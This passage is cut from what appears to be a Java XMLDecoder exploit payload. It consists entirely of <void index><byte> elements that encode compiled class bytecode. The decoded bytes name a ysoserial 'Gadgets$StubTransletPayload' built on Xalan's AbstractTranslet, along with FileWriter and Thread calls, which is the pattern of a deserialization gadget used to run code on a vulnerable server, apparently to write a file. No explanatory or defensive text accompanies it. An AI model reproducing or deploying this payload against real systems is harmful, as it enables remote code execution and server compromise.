index=\"881\"><byte>120</byte></void><void index=\"882\"><byte>99</byte></void><void index=\"883\"><byte>101</byte></void><void index=\"884\"><byte>112</byte></void><void index=\"885\"><byte>116</byte></void><void index=\"886\"><byte>105</byte></void><void index=\"887\"><byte>111</byte></void><void index=\"888\"><byte>110</byte></void><void index=\"889\"><byte>115</byte></void><void index=\"890\"><byte>7</byte></void><void index=\"891\"><byte>0</byte></void><void index=\"892\"><byte>39</byte></void><void index=\"893\"><byte>1</byte></void><void index=\"894\"><byte>0</byte></void><void index=\"895\"><byte>-90</byte></void><void index=\"896\"><byte>40</byte></void><void index=\"897\"><byte>76</byte></void><void index=\"898\"><byte>99</byte></void><void index=\"899\"><byte>111</byte></void><void index=\"900\"><byte>109</byte></void><void index=\"901\"><byte>47</byte></void><void index=\"902\"><byte>115</byte></void><void index=\"903\"><byte>117</byte></void><void index=\"904\"><byte>110</byte></void><void index=\"905\"><byte>47</byte></void><void index=\"906\"><byte>111</byte></void><void index=\"907\"><byte>114</byte></void><void index=\"908\"><byte>103</byte></void><void index=\"909\"><byte>47</byte></void><void index=\"910\"><byte>97</byte></void><void index=\"911\"><byte>112</byte></void><void index=\"912\"><byte>97</byte></void><void index=\"913\"><byte>99</byte></void><void index=\"914\"><byte>104</byte></void><void index=\"915\"><byte>101</byte></void><void index=\"916\"><byte>47</byte></void><void index=\"917\"><byte>120</byte></void><void index=\"918\"><byte>97</byte></void><void index=\"919\"><byte>108</byte></void><void index=\"920\"><byte>97</byte></void><void index=\"921\"><byte>110</byte></void><void index=\"922\"><byte>47</byte></void><void index=\"923\"><byte>105</byte></void><void index=\"924\"><byte>110</byte></void><void index=\"925\"><byte>116</byte></void><void index=\"926\"><byte>101</byte></void><void index=\"927\"><byte>114</byte></void><void index=\"928\"><byte>110</byte></void><void index=\"929\"><byte>97</byte></void><void index=\"930\"><byte>108</byte></void><void index=\"931\"><byte>47</byte></void><void index=\"932\"><byte>120</byte></void><void index=\"933\"><byte>115</byte></void><void index=\"934\"><byte>108</byte></void><void index=\"935\"><byte>116</byte></void><void index=\"936\"><byte>99</byte></void><void index=\"937\"><byte>47</byte></void><void index=\"938\"><byte>68</byte></void><void index=\"939\"><byte>79</byte></void><void index=\"940\"><byte>77</byte></void><void index=\"941\"><byte>59</byte></void><void index=\"942\"><byte>76</byte></void><void index=\"943\"><byte>99</byte></void><void index=\"944\"><byte>111</byte></void><void index=\"945\"><byte>109</byte></void><void index=\"946\"><byte>47</byte></void><void index=\"947\"><byte>115</byte></void><void index=\"948\"><byte>117</byte></void><void index=\"949\"><byte>110</byte></void><void index=\"950\"><byte>47</byte></void><void index=\"951\"><byte>111</byte></void><void index=\"952\"><byte>114</byte></void><void index=\"953\"><byte>103</byte></void><void index=\"954\"><byte>47</byte></void><void index=\"955\"><byte>97</byte></void><void index=\"956\"><byte>112</byte></void><void index=\"957\"><byte>97</byte></void><void index=\"958\"><byte>99</byte></void><void index=\"959\"><byte>104</byte></void><void index=\"960\"><byte>101</byte></void><void index=\"961\"><byte>47</byte></void><void index=\"962\"><byte>120</byte></void><void index=\"963\"><byte>109</byte></void><void index=\"964\"><byte>108</byte></void><void index=\"965\"><byte>47</byte></void><void index=\"966\"><byte>105</byte></void><void index=\"967\"><byte>110</byte></void><void index=\"968\"><byte>116</byte></void><void index=\"969\"><byte>101</byte></void><void index=\"970\"><byte>114</byte></void><void index=\"971\"><byte>110</byte></void><void index=\"972\"><byte>97</byte></void><void index=\"973\"><byte>108</byte></void><void index=\"974\"><byte>47</byte></void><void index=\"975\"><byte>100</byte></void><void index=\"976\"><byte>116</byte></void><void index=\"977\"><byte>109</byte></void><void index=\"978\"><byte>47</byte></void><void index=\"979\"><byte>68</byte></void><void index=\"980\"><byte>84</byte></void><void index=\"981\"><byte>77</byte></void><void index=\"982\"><byte>65</byte></void><void index=\"983\"><byte>120</byte></void><void index=\"984\"><byte>105</byte></void><void index=\"985\"><byte>115</byte></void><void index=\"986\"><byte>73</byte></void><void index=\"987\"><byte>116</byte></void><void index=\"988\"><byte>101</byte></void><void index=\"989\"><byte>114</byte></void><void index=\"990\"><byte>97</byte></void><void index=\"991\"><byte>116</byte></void><void index=\"992\"><byte>111</byte></void><void index=\"993\"><byte>114</byte></void><void index=\"994\"><byte>59</byte></void><void index=\"995\"><byte>76</byte></void><void index=\"996\"><byte>99</byte></void><void index=\"997\"><byte>111</byte></void><void index=\"998\"><byte>109</byte></void><void index=\"999\"><byte>47</byte></void><void index=\"1000\"><byte>115</byte></void><void index=\"1001\"><byte>117</byte></void><void index=\"1002\"><byte>110</byte></void><void index=\"1003\"><byte>47</byte></void><void index=\"1004\"><byte>111</byte></void><void index=\"1005\"><byte>114</byte></void><void index=\"1006\"><byte>103</byte></void><void index=\"1007\"><byte>47</byte></void><void index=\"1008\"><byte>97</byte></void><void index=\"1009\"><byte>112</byte></void><void index=\"1010\"><byte>97</byte></void><void index=\"1011\"><byte>99</byte></void><void index=\"1012\"><byte>104</byte></void><void index=\"1013\"><byte>101</byte></void><void index=\"1014\"><byte>47</byte></void><void index=\"1015\"><byte>120</byte></void><void index=\"1016\"><byte>109</byte></void><void index=\"1017\"><byte>108</byte></void><void index=\"1018\"><byte>47</byte></void><void index=\"1019\"><byte>105</byte></void><void index=\"1020\"><byte>110</byte></void><void index=\"1021\"><byte>116</byte></void><void index=\"1022\"><byte>101</byte></void><void index=\"1023\"><byte>114</byte></void><void index=\"1024\"><byte>110</byte></void><void index=\"1025\"><byte>97</byte></void><void index=\"1026\"><byte>108</byte></void><void index=\"1027\"><byte>47</byte></void><void index=\"1028\"><byte>115</byte></void><void index=\"1029\"><byte>101</byte></void><void index=\"1030\"><byte>114</byte></void><void index=\"1031\"><byte>105</byte></void><void index=\"1032\"><byte>97</byte></void><void index=\"1033\"><byte>108</byte></void><void index=\"1034\"><byte>105</byte></void><void index=\"1035\"><byte>122</byte></void><void index=\"1036\"><byte>101</byte></void><void index=\"1037\"><byte>114</byte></void><void index=\"1038\"><byte>47</byte></void><void index=\"1039\"><byte>83</byte></void><void index=\"1040\"><byte>101</byte></void><void index=\"1041\"><byte>114</byte></void><void index=\"1042\"><byte>105</byte></void><void index=\"1043\"><byte>97</byte></void><void index=\"1044\"><byte>108</byte></void><void index=\"1045\"><byte>105</byte></void><void index=\"1046\"><byte>122</byte></void><void index=\"1047\"><byte>97</byte></void><void index=\"1048\"><byte>116</byte></void><void index=\"1049\"><byte>105</byte></void><void index=\"1050\"><byte>111</byte></void><void index=\"1051\"><byte>110</byte></void><void index=\"1052\"><byte>72</byte></void><void index=\"1053\"><byte>97</byte></void><void index=\"1054\"><byte>110</byte></void><void index=\"1055\"><byte>100</byte></void><void index=\"1056\"><byte>108</byte></void><void index=\"1057\"><byte>101</byte></void><void index=\"1058\"><byte>114</byte></void><void index=\"1059\"><byte>59</byte></void><void index=\"1060\"><byte>41</byte></void><void index=\"1061\"><byte>86</byte></void><void index=\"1062\"><byte>1</byte></void><void index=\"1063\"><byte>0</byte></void><void index=\"1064\"><byte>8</byte></void><void index=\"1065\"><byte>105</byte></void><void index=\"1066\"><byte>116</byte></void><void index=\"1067\"><byte>101</byte></void><void index=\"1068\"><byte>114</byte></void><void index=\"1069\"><byte>97</byte></void><void index=\"1070\"><byte>116</byte></void><void index=\"1071\"><byte>111</byte></void><void index=\"1072\"><byte>114</byte></void><void index=\"1073\"><byte>1</byte></void><void index=\"1074\"><byte>0</byte></void><void index=\"1075\"><byte>53</byte></void><void index=\"1076\"><byte>76</byte></void><void index=\"1077\"><byte>99</byte></void><void index=\"1078\"><byte>111</byte></void><void index=\"1079\"><byte>109</byte></void><void index=\"1080\"><byte>47</byte></void><void index=\"1081\"><byte>115</byte></void><void index=\"1082\"><byte>117</byte></void><void index=\"1083\"><byte>110</byte></void><void index=\"1084\"><byte>47</byte></void><void index=\"1085\"><byte>111</byte></void><void index=\"1086\"><byte>114</byte></void><void index=\"1087\"><byte>103</byte></void><void index=\"1088\"><byte>47</byte></void><void index=\"1089\"><byte>97</byte></void><void index=\"1090\"><byte>112</byte></void><void index=\"1091\"><byte>97</byte></void><void index=\"1092\"><byte>99</byte></void><void index=\"1093\"><byte>104</byte></void><void index=\"1094\"><byte>101</byte></void><void index=\"1095\"><byte>47</byte></void><void index=\"1096\"><byte>120</byte></void><void index=\"1097\"><byte>109</byte></void><void index=\"1098\"><byte>108</byte></void><void index=\"1099\"><byte>47</byte></void><void index=\"1100\"><byte>105</byte></void><void index=\"1101\"><byte>110</byte></void><void index=\"1102\"><byte>116</byte></void><void index=\"1103\"><byte>101</byte></void><void index=\"1104\"><byte>114</byte></void><void index=\"1105\"><byte>110</byte></void><void index=\"1106\"><byte>97</byte></void><void index=\"1107\"><byte>108</byte></void><void index=\"1108\"><byte>47</byte></void><void index=\"1109\"><byte>100</byte></void><void index=\"1110\"><byte>116</byte></void><void index=\"1111\"><byte>109</byte></void><void index=\"1112\"><byte>47</byte></void><void index=\"1113\"><byte>68</byte></void><void index=\"1114\"><byte>84</byte></void><void index=\"1115\"><byte>77</byte></void><void index=\"1116\"><byte>65</byte></void><void index=\"1117\"><byte>120</byte></void><void index=\"1118\"><byte>105</byte></void><void index=\"1119\"><byte>115</byte></void><void index=\"1120\"><byte>73</byte></void><void index=\"1121\"><byte>116</byte></void><void index=\"1122\"><byte>101</byte></void><void index=\"1123\"><byte>114</byte></void><void index=\"1124\"><byte>97</byte></void><void index=\"1125\"><byte>116</byte></void><void index=\"1126\"><byte>111</byte></void><void index=\"1127\"><byte>114</byte></void><void index=\"1128\"><byte>59</byte></void><void index=\"1129\"><byte>1</byte></void><void index=\"1130\"><byte>0</byte></void><void index=\"1131\"><byte>7</byte></void><void index=\"1132\"><byte>104</byte></void><void index=\"1133\"><byte>97</byte></void><void index=\"1134\"><byte>110</byte></void><void index=\"1135\"><byte>100</byte></void><void index=\"1136\"><byte>108</byte></void><void index=\"1137\"><byte>101</byte></void><void index=\"1138\"><byte>114</byte></void><void index=\"1139\"><byte>1</byte></void><void index=\"1140\"><byte>0</byte></void><void index=\"1141\"><byte>65</byte></void><void index=\"1142\"><byte>76</byte></void><void index=\"1143\"><byte>99</byte></void><void index=\"1144\"><byte>111</byte></void><void index=\"1145\"><byte>109</byte></void><void index=\"1146\"><byte>47</byte></void><void index=\"1147\"><byte>115</byte></void><void index=\"1148\"><byte>117</byte></void><void index=\"1149\"><byte>110</byte></void><void index=\"1150\"><byte>47</byte></void><void index=\"1151\"><byte>111</byte></void><void index=\"1152\"><byte>114</byte></void><void index=\"1153\"><byte>103</byte></void><void index=\"1154\"><byte>47</byte></void><void index=\"1155\"><byte>97</byte></void><void index=\"1156\"><byte>112</byte></void><void index=\"1157\"><byte>97</byte></void><void index=\"1158\"><byte>99</byte></void><void index=\"1159\"><byte>104</byte></void><void index=\"1160\"><byte>101</byte></void><void index=\"1161\"><byte>47</byte></void><void index=\"1162\"><byte>120</byte></void><void index=\"1163\"><byte>109</byte></void><void index=\"1164\"><byte>108</byte></void><void index=\"1165\"><byte>47</byte></void><void index=\"1166\"><byte>105</byte></void><void index=\"1167\"><byte>110</byte></void><void index=\"1168\"><byte>116</byte></void><void index=\"1169\"><byte>101</byte></void><void index=\"1170\"><byte>114</byte></void><void index=\"1171\"><byte>110</byte></void><void index=\"1172\"><byte>97</byte></void><void index=\"1173\"><byte>108</byte></void><void index=\"1174\"><byte>47</byte></void><void index=\"1175\"><byte>115</byte></void><void index=\"1176\"><byte>101</byte></void><void index=\"1177\"><byte>114</byte></void><void index=\"1178\"><byte>105</byte></void><void index=\"1179\"><byte>97</byte></void><void index=\"1180\"><byte>108</byte></void><void index=\"1181\"><byte>105</byte></void><void index=\"1182\"><byte>122</byte></void><void index=\"1183\"><byte>101</byte></void><void index=\"1184\"><byte>114</byte></void><void index=\"1185\"><byte>47</byte></void><void index=\"1186\"><byte>83</byte></void><void index=\"1187\"><byte>101</byte></void><void index=\"1188\"><byte>114</byte></void><void index=\"1189\"><byte>105</byte></void><void index=\"1190\"><byte>97</byte></void><void index=\"1191\"><byte>108</byte></void><void index=\"1192\"><byte>105</byte></void><void index=\"1193\"><byte>122</byte></void><void index=\"1194\"><byte>97</byte></void><void index=\"1195\"><byte>116</byte></void><void index=\"1196\"><byte>105</byte></void><void index=\"1197\"><byte>111</byte></void><void index=\"1198\"><byte>110</byte></void><void index=\"1199\"><byte>72</byte></void><void index=\"1200\"><byte>97</byte></void><void index=\"1201\"><byte>110</byte></void><void index=\"1202\"><byte>100</byte></void><void index=\"1203\"><byte>108</byte></void><void index=\"1204\"><byte>101</byte></void><void index=\"1205\"><byte>114</byte></void><void index=\"1206\"><byte>59</byte></void><void index=\"1207\"><byte>1</byte></void><void index=\"1208\"><byte>0</byte></void><void index=\"1209\"><byte>10</byte></void><void index=\"1210\"><byte>83</byte></void><void index=\"1211\"><byte>111</byte></void><void index=\"1212\"><byte>117</byte></void><void index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>99</byte></void><void index=\"1215\"><byte>101</byte></void><void index=\"1216\"><byte>70</byte></void><void index=\"1217\"><byte>105</byte></void><void index=\"1218\"><byte>108</byte></void><void index=\"1219\"><byte>101</byte></void><void index=\"1220\"><byte>1</byte></void><void index=\"1221\"><byte>0</byte></void><void index=\"1222\"><byte>12</byte></void><void index=\"1223\"><byte>71</byte></void><void index=\"1224\"><byte>97</byte></void><void index=\"1225\"><byte>100</byte></void><void index=\"1226\"><byte>103</byte></void><void index=\"1227\"><byte>101</byte></void><void index=\"1228\"><byte>116</byte></void><void index=\"1229\"><byte>115</byte></void><void index=\"1230\"><byte>46</byte></void><void index=\"1231\"><byte>106</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>118</byte></void><void index=\"1234\"><byte>97</byte></void><void index=\"1235\"><byte>12</byte></void><void index=\"1236\"><byte>0</byte></void><void index=\"1237\"><byte>10</byte></void><void index=\"1238\"><byte>0</byte></void><void index=\"1239\"><byte>11</byte></void><void index=\"1240\"><byte>7</byte></void><void index=\"1241\"><byte>0</byte></void><void index=\"1242\"><byte>40</byte></void><void index=\"1243\"><byte>1</byte></void><void index=\"1244\"><byte>0</byte></void><void index=\"1245\"><byte>51</byte></void><void index=\"1246\"><byte>121</byte></void><void index=\"1247\"><byte>115</byte></void><void index=\"1248\"><byte>111</byte></void><void index=\"1249\"><byte>115</byte></void><void index=\"1250\"><byte>101</byte></void><void index=\"1251\"><byte>114</byte></void><void index=\"1252\"><byte>105</byte></void><void index=\"1253\"><byte>97</byte></void><void index=\"1254\"><byte>108</byte></void><void index=\"1255\"><byte>47</byte></void><void index=\"1256\"><byte>112</byte></void><void index=\"1257\"><byte>97</byte></void><void index=\"1258\"><byte>121</byte></void><void index=\"1259\"><byte>108</byte></void><void index=\"1260\"><byte>111</byte></void><void index=\"1261\"><byte>97</byte></void><void index=\"1262\"><byte>100</byte></void><void index=\"1263\"><byte>115</byte></void><void index=\"1264\"><byte>47</byte></void><void index=\"1265\"><byte>117</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>105</byte></void><void index=\"1268\"><byte>108</byte></void><void index=\"1269\"><byte>47</byte></void><void index=\"1270\"><byte>71</byte></void><void index=\"1271\"><byte>97</byte></void><void index=\"1272\"><byte>100</byte></void><void index=\"1273\"><byte>103</byte></void><void index=\"1274\"><byte>101</byte></void><void index=\"1275\"><byte>116</byte></void><void index=\"1276\"><byte>115</byte></void><void index=\"1277\"><byte>36</byte></void><void index=\"1278\"><byte>83</byte></void><void index=\"1279\"><byte>116</byte></void><void index=\"1280\"><byte>117</byte></void><void index=\"1281\"><byte>98</byte></void><void index=\"1282\"><byte>84</byte></void><void index=\"1283\"><byte>114</byte></void><void index=\"1284\"><byte>97</byte></void><void index=\"1285\"><byte>110</byte></void><void index=\"1286\"><byte>115</byte></void><void index=\"1287\"><byte>108</byte></void><void index=\"1288\"><byte>101</byte></void><void index=\"1289\"><byte>116</byte></void><void index=\"1290\"><byte>80</byte></void><void index=\"1291\"><byte>97</byte></void><void index=\"1292\"><byte>121</byte></void><void index=\"1293\"><byte>108</byte></void><void index=\"1294\"><byte>111</byte></void><void index=\"1295\"><byte>97</byte></void><void index=\"1296\"><byte>100</byte></void><void index=\"1297\"><byte>1</byte></void><void index=\"1298\"><byte>0</byte></void><void index=\"1299\"><byte>64</byte></void><void index=\"1300\"><byte>99</byte></void><void index=\"1301\"><byte>111</byte></void><void index=\"1302\"><byte>109</byte></void><void index=\"1303\"><byte>47</byte></void><void index=\"1304\"><byte>115</byte></void><void index=\"1305\"><byte>117</byte></void><void index=\"1306\"><byte>110</byte></void><void index=\"1307\"><byte>47</byte></void><void index=\"1308\"><byte>111</byte></void><void index=\"1309\"><byte>114</byte></void><void index=\"1310\"><byte>103</byte></void><void index=\"1311\"><byte>47</byte></void><void index=\"1312\"><byte>97</byte></void><void index=\"1313\"><byte>112</byte></void><void index=\"1314\"><byte>97</byte></void><void index=\"1315\"><byte>99</byte></void><void index=\"1316\"><byte>104</byte></void><void index=\"1317\"><byte>101</byte></void><void index=\"1318\"><byte>47</byte></void><void index=\"1319\"><byte>120</byte></void><void index=\"1320\"><byte>97</byte></void><void index=\"1321\"><byte>108</byte></void><void index=\"1322\"><byte>97</byte></void><void index=\"1323\"><byte>110</byte></void><void index=\"1324\"><byte>47</byte></void><void index=\"1325\"><byte>105</byte></void><void index=\"1326\"><byte>110</byte></void><void index=\"1327\"><byte>116</byte></void><void index=\"1328\"><byte>101</byte></void><void index=\"1329\"><byte>114</byte></void><void index=\"1330\"><byte>110</byte></void><void index=\"1331\"><byte>97</byte></void><void index=\"1332\"><byte>108</byte></void><void index=\"1333\"><byte>47</byte></void><void index=\"1334\"><byte>120</byte></void><void index=\"1335\"><byte>115</byte></void><void index=\"1336\"><byte>108</byte></void><void index=\"1337\"><byte>116</byte></void><void index=\"1338\"><byte>99</byte></void><void index=\"1339\"><byte>47</byte></void><void index=\"1340\"><byte>114</byte></void><void index=\"1341\"><byte>117</byte></void><void index=\"1342\"><byte>110</byte></void><void index=\"1343\"><byte>116</byte></void><void index=\"1344\"><byte>105</byte></void><void index=\"1345\"><byte>109</byte></void><void index=\"1346\"><byte>101</byte></void><void index=\"1347\"><byte>47</byte></void><void index=\"1348\"><byte>65</byte></void><void index=\"1349\"><byte>98</byte></void><void index=\"1350\"><byte>115</byte></void><void index=\"1351\"><byte>116</byte></void><void index=\"1352\"><byte>114</byte></void><void index=\"1353\"><byte>97</byte></void><void index=\"1354\"><byte>99</byte></void><void index=\"1355\"><byte>116</byte></void><void index=\"1356\"><byte>84</byte></void><void index=\"1357\"><byte>114</byte></void><void index=\"1358\"><byte>97</byte></void><void index=\"1359\"><byte>110</byte></void><void index=\"1360\"><byte>115</byte></void><void index=\"1361\"><byte>108</byte></void><void index=\"1362\"><byte>101</byte></void><void index=\"1363\"><byte>116</byte></void><void index=\"1364\"><byte>1</byte></void><void index=\"1365\"><byte>0</byte></void><void index=\"1366\"><byte>20</byte></void><void index=\"1367\"><byte>106</byte></void><void index=\"1368\"><byte>97</byte></void><void index=\"1369\"><byte>118</byte></void><void index=\"1370\"><byte>97</byte></void><void index=\"1371\"><byte>47</byte></void><void index=\"1372\"><byte>105</byte></void><void index=\"1373\"><byte>111</byte></void><void index=\"1374\"><byte>47</byte></void><void index=\"1375\"><byte>83</byte></void><void index=\"1376\"><byte>101</byte></void><void index=\"1377\"><byte>114</byte></void><void index=\"1378\"><byte>105</byte></void><void index=\"1379\"><byte>97</byte></void><void index=\"1380\"><byte>108</byte></void><void index=\"1381\"><byte>105</byte></void><void index=\"1382\"><byte>122</byte></void><void index=\"1383\"><byte>97</byte></void><void index=\"1384\"><byte>98</byte></void><void index=\"1385\"><byte>108</byte></void><void index=\"1386\"><byte>101</byte></void><void index=\"1387\"><byte>1</byte></void><void index=\"1388\"><byte>0</byte></void><void index=\"1389\"><byte>57</byte></void><void index=\"1390\"><byte>99</byte></void><void index=\"1391\"><byte>111</byte></void><void index=\"1392\"><byte>109</byte></void><void index=\"1393\"><byte>47</byte></void><void index=\"1394\"><byte>115</byte></void><void index=\"1395\"><byte>117</byte></void><void index=\"1396\"><byte>110</byte></void><void index=\"1397\"><byte>47</byte></void><void index=\"1398\"><byte>111</byte></void><void index=\"1399\"><byte>114</byte></void><void index=\"1400\"><byte>103</byte></void><void index=\"1401\"><byte>47</byte></void><void index=\"1402\"><byte>97</byte></void><void index=\"1403\"><byte>112</byte></void><void index=\"1404\"><byte>97</byte></void><void index=\"1405\"><byte>99</byte></void><void index=\"1406\"><byte>104</byte></void><void index=\"1407\"><byte>101</byte></void><void index=\"1408\"><byte>47</byte></void><void index=\"1409\"><byte>120</byte></void><void index=\"1410\"><byte>97</byte></void><void index=\"1411\"><byte>108</byte></void><void index=\"1412\"><byte>97</byte></void><void index=\"1413\"><byte>110</byte></void><void index=\"1414\"><byte>47</byte></void><void index=\"1415\"><byte>105</byte></void><void index=\"1416\"><byte>110</byte></void><void index=\"1417\"><byte>116</byte></void><void index=\"1418\"><byte>101</byte></void><void index=\"1419\"><byte>114</byte></void><void index=\"1420\"><byte>110</byte></void><void index=\"1421\"><byte>97</byte></void><void index=\"1422\"><byte>108</byte></void><void index=\"1423\"><byte>47</byte></void><void index=\"1424\"><byte>120</byte></void><void index=\"1425\"><byte>115</byte></void><void index=\"1426\"><byte>108</byte></void><void index=\"1427\"><byte>116</byte></void><void index=\"1428\"><byte>99</byte></void><void index=\"1429\"><byte>47</byte></void><void index=\"1430\"><byte>84</byte></void><void index=\"1431\"><byte>114</byte></void><void index=\"1432\"><byte>97</byte></void><void index=\"1433\"><byte>110</byte></void><void index=\"1434\"><byte>115</byte></void><void index=\"1435\"><byte>108</byte></void><void index=\"1436\"><byte>101</byte></void><void index=\"1437\"><byte>116</byte></void><void index=\"1438\"><byte>69</byte></void><void index=\"1439\"><byte>120</byte></void><void index=\"1440\"><byte>99</byte></void><void index=\"1441\"><byte>101</byte></void><void index=\"1442\"><byte>112</byte></void><void index=\"1443\"><byte>116</byte></void><void index=\"1444\"><byte>105</byte></void><void index=\"1445\"><byte>111</byte></void><void index=\"1446\"><byte>110</byte></void><void index=\"1447\"><byte>1</byte></void><void index=\"1448\"><byte>0</byte></void><void index=\"1449\"><byte>31</byte></void><void index=\"1450\"><byte>121</byte></void><void index=\"1451\"><byte>115</byte></void><void index=\"1452\"><byte>111</byte></void><void index=\"1453\"><byte>115</byte></void><void index=\"1454\"><byte>101</byte></void><void index=\"1455\"><byte>114</byte></void><void index=\"1456\"><byte>105</byte></void><void index=\"1457\"><byte>97</byte></void><void index=\"1458\"><byte>108</byte></void><void index=\"1459\"><byte>47</byte></void><void index=\"1460\"><byte>112</byte></void><void index=\"1461\"><byte>97</byte></void><void index=\"1462\"><byte>121</byte></void><void index=\"1463\"><byte>108</byte></void><void index=\"1464\"><byte>111</byte></void><void index=\"1465\"><byte>97</byte></void><void index=\"1466\"><byte>100</byte></void><void index=\"1467\"><byte>115</byte></void><void index=\"1468\"><byte>47</byte></void><void index=\"1469\"><byte>117</byte></void><void index=\"1470\"><byte>116</byte></void><void index=\"1471\"><byte>105</byte></void><void index=\"1472\"><byte>108</byte></void><void index=\"1473\"><byte>47</byte></void><void index=\"1474\"><byte>71</byte></void><void index=\"1475\"><byte>97</byte></void><void index=\"1476\"><byte>100</byte></void><void index=\"1477\"><byte>103</byte></void><void index=\"1478\"><byte>101</byte></void><void index=\"1479\"><byte>116</byte></void><void index=\"1480\"><byte>115</byte></void><void index=\"1481\"><byte>1</byte></void><void index=\"1482\"><byte>0</byte></void><void index=\"1483\"><byte>8</byte></void><void index=\"1484\"><byte>60</byte></void><void index=\"1485\"><byte>99</byte></void><void index=\"1486\"><byte>108</byte></void><void index=\"1487\"><byte>105</byte></void><void index=\"1488\"><byte>110</byte></void><void index=\"1489\"><byte>105</byte></void><void index=\"1490\"><byte>116</byte></void><void index=\"1491\"><byte>62</byte></void><void index=\"1492\"><byte>1</byte></void><void index=\"1493\"><byte>0</byte></void><void index=\"1494\"><byte>18</byte></void><void index=\"1495\"><byte>106</byte></void><void index=\"1496\"><byte>97</byte></void><void index=\"1497\"><byte>118</byte></void><void index=\"1498\"><byte>97</byte></void><void index=\"1499\"><byte>47</byte></void><void index=\"1500\"><byte>105</byte></void><void index=\"1501\"><byte>111</byte></void><void index=\"1502\"><byte>47</byte></void><void index=\"1503\"><byte>70</byte></void><void index=\"1504\"><byte>105</byte></void><void index=\"1505\"><byte>108</byte></void><void index=\"1506\"><byte>101</byte></void><void index=\"1507\"><byte>87</byte></void><void index=\"1508\"><byte>114</byte></void><void index=\"1509\"><byte>105</byte></void><void index=\"1510\"><byte>116</byte></void><void index=\"1511\"><byte>101</byte></void><void index=\"1512\"><byte>114</byte></void><void index=\"1513\"><byte>7</byte></void><void index=\"1514\"><byte>0</byte></void><void index=\"1515\"><byte>42</byte></void><void index=\"1516\"><byte>1</byte></void><void index=\"1517\"><byte>0</byte></void><void index=\"1518\"><byte>22</byte></void><void index=\"1519\"><byte>106</byte></void><void index=\"1520\"><byte>97</byte></void><void index=\"1521\"><byte>118</byte></void><void index=\"1522\"><byte>97</byte></void><void index=\"1523\"><byte>47</byte></void><void index=\"1524\"><byte>108</byte></void><void index=\"1525\"><byte>97</byte></void><void index=\"1526\"><byte>110</byte></void><void index=\"1527\"><byte>103</byte></void><void index=\"1528\"><byte>47</byte></void><void index=\"1529\"><byte>83</byte></void><void index=\"1530\"><byte>116</byte></void><void index=\"1531\"><byte>114</byte></void><void index=\"1532\"><byte>105</byte></void><void index=\"1533\"><byte>110</byte></void><void index=\"1534\"><byte>103</byte></void><void index=\"1535\"><byte>66</byte></void><void index=\"1536\"><byte>117</byte></void><void index=\"1537\"><byte>102</byte></void><void index=\"1538\"><byte>102</byte></void><void index=\"1539\"><byte>101</byte></void><void index=\"1540\"><byte>114</byte></void><void index=\"1541\"><byte>7</byte></void><void index=\"1542\"><byte>0</byte></void><void index=\"1543\"><byte>44</byte></void><void index=\"1544\"><byte>10</byte></void><void index=\"1545\"><byte>0</byte></void><void index=\"1546\"><byte>45</byte></void><void index=\"1547\"><byte>0</byte></void><void index=\"1548\"><byte>34</byte></void><void index=\"1549\"><byte>1</byte></void><void index=\"1550\"><byte>0</byte></void><void index=\"1551\"><byte>16</byte></void><void index=\"1552\"><byte>106</byte></void><void index=\"1553\"><byte>97</byte></void><void index=\"1554\"><byte>118</byte></void><void index=\"1555\"><byte>97</byte></void><void index=\"1556\"><byte>47</byte></void><void index=\"1557\"><byte>108</byte></void><void index=\"1558\"><byte>97</byte></void><void index=\"1559\"><byte>110</byte></void><void index=\"1560\"><byte>103</byte></void><void index=\"1561\"><byte>47</byte></void><void index=\"1562\"><byte>84</byte></void><void index=\"1563\"><byte>104</byte></void><void index=\"1564\"><byte>114</byte></void><void index=\"1565\"><byte>101</byte></void><void index=\"1566\"><byte>97</byte></void><void index=\"1567\"><byte>100</byte></void><void index=\"1568\"><byte>7</byte></void><void index=\"1569\"><byte>0</byte></void><void index=\"1570\"><byte>47</byte></void><void index=\"1571\"><byte>1</byte></void><void index=\"1572\"><byte>0</byte></void><void index=\"1573\"><byte>13</byte></void><void index=\"1574\"><byte>99</byte></void><void index=\"1575\"><byte>117</byte></void><void index=\"1576\"><byte>114</byte></void><void index=\"1577\"><byte>114</byte></void><void index=\"1578\"><byte>101</byte></void><void index=\"1579\"><byte>110</byte></void><void index=\"1580\"><byte>116</byte></void><void index=\"1581\"><byte>84</byte></void><void index=\"1582\"><byte>104</byte></void><void index=\"1583\"><byte>114</byte></void><void index=\"1584\"><byte>101</byte></void><void index=\"1585\"><byte>97</byte></void><void index=\"1586\"><byte>100</byte></void><void index=\"1587\"><byte>1</byte></void><void index=\"1588\"><byte>0</byte></void><void index=\"1589\"><byte>20</byte></void><void index=\"1590\"><byte>40</byte></void><void index=\"1591\"><byte>41</byte></void><void index=\"1592\"><byte>76</byte></void><void index=\"1593\"><byte>106</byte></void><void index=\"1594\"><byte>97</byte></void><void index=\"1595\"><byte>118</byte></void><void index=\"1596\"><byte>97</byte></void><void index=\"1597\"><byte>47</byte></void><void index=\"1598\"><byte>108</byte></void><void index=\"1599\"><byte>97</byte></void><void index=\"1600\"><byte>110</byte></void><void index=\"1601\"><byte>103</byte></void><void index=\"1602\"><byte>47</byte></void><void index=\"1603\"><byte>84</byte></void><void index=\"1604\"><byte>104</byte></void><void index=\"1605\"><byte>114</byte></void><void index=\"1606\"><byte>101</byte></void><void index=\"1607\"><byte>97</byte></void><void index=\"1608\"><byte>100</byte></void><void index=\"1609\"><byte>59</byte></void><void index=\"1610\"><byte>12</byte></void><void index=\"1611\"><byte>0</byte></void><void index=\"1612\"><byte>49</byte></void><void index=\"1613\"><byte>0</byte></void><void index=\"1614\"><byte>50</byte></void><void index=\"1615\"><byte>10</byte></void><void index=\"1616\"><byte>0</byte></void><void index=\"1617\"><byte>48</byte></void><void index=\"1618\"><byte>0</byte></void><void index=\"1619\"><byte>51</byte></void><void index=\"1620\"><byte>1</byte></void><void index=\"1621\"><byte>0</byte></void><void index=\"1622\"><byte>21</byte></void><void index=\"1623\"><byte>103</byte></void><void index=\"1624\"><byte>101</byte></void><void index=\"1625\"><byte>116</byte></void><void index=\"1626\"><byte>67</byte></void><void index=\"1627\"><byte>111</byte></void><void index=\"1628\"><byte>110</byte></void><void index=\"1629\"><byte>116</byte></void><void index=\"1630\"><byte>101</byte></void><void index=\"1631\"><byte>120</byte></void><void index=\"1632\"><byte>116</byte></void><void index=\"1633\"><byte>67</byte></void><void index=\"1634\"><byte>108</byte></void><void index=\"1635\"><byte>97</byte></void><void 